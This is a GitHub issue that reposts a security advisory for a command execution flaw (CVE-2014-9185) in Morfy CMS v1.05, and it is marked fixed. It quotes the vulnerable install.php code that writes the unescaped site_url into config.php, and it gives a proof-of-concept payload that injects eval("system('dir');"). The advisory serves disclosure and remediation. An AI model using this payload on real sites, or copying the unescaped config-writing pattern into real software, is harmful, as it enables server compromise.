Skip to content

FIXED - Morfy CMS v1.05 - Command Execution Vulnerability #351

Closed
@remove23

Description

@remove23

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1367

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9185

CVE-ID:

CVE-2014-9185

Technical Details & Description:

A command execution web vulnerability has been discovered in the official Morfy v1.05 Content Management System.
The vulnerability allows an attacker to unauthorized execution system specific commands that compromises the online
web-application or connected dbms.

The vulnerability is located in the site_url parameter of the default content management system install.php file.
Remote attackers are able to execute system specific commands to compromise the application by usage of malicious
requests that run through the vulnerable site_url value. The request method to inject the code is POST via Add.

The security risk of the vulnerability is estimated as critical with a cvss (common vulnerability scoring system)
count of 5.2. Exploitation of the web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the command execution vulnerability results in content management system compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Install

Vulnerable File(s):
[+] install.php

Vulnerable Parameter(s):
[+] site_url

Proof of Concept (PoC):

The vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...

  1. Download the morfy content management system
  2. Use the default and access the installation file (install.php)
  3. Inject the following payload website.com}','yibelo'=> eval("system('dir');"), (as website url) by usage of the Add function
  4. Then navigate to site.com/config.php which shall get executed because that will result site_url'='website.com}','yibelo'=>eval("system('dir');"),//',
  5. Successful reproduce of the security vulnerability!

Vulnerable Source: install.php < config.php

./install.php Line 57
$post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77
file_put_contents('config.php', "<?php
return array(
'site_url' => '{$post_site_url}',
'site_charset' => 'UTF-8',
'site_timezone' => '{$post_site_timezone}',
'site_theme' => 'default',
'site_title' => '{$post_site_title}',
'site_description' => '{$post_site_description}',
'site_keywords' => '{$post_site_keywords}',
'email' => '{$post_email}',
'plugins' => array(
'markdown',
'sitemap',
), );");

Reference(s):
http://morfy.127.0.0.1:8080/install.php
http://morfy.127.0.0.1:8080/config.php

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions